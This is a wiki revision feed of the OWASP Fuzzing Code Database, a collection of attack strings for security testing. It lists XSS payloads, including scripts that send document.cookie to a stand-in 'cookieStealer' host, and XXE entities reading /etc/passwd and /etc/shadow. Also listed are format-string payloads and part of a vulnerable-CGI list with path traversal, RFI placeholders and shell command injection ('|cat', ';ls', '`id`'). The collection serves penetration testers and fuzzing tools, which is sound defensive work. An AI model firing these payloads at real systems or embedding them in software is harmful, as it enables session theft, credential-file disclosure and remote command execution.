&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80090</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80090"/>
				<updated>2010-03-17T23:12:47Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
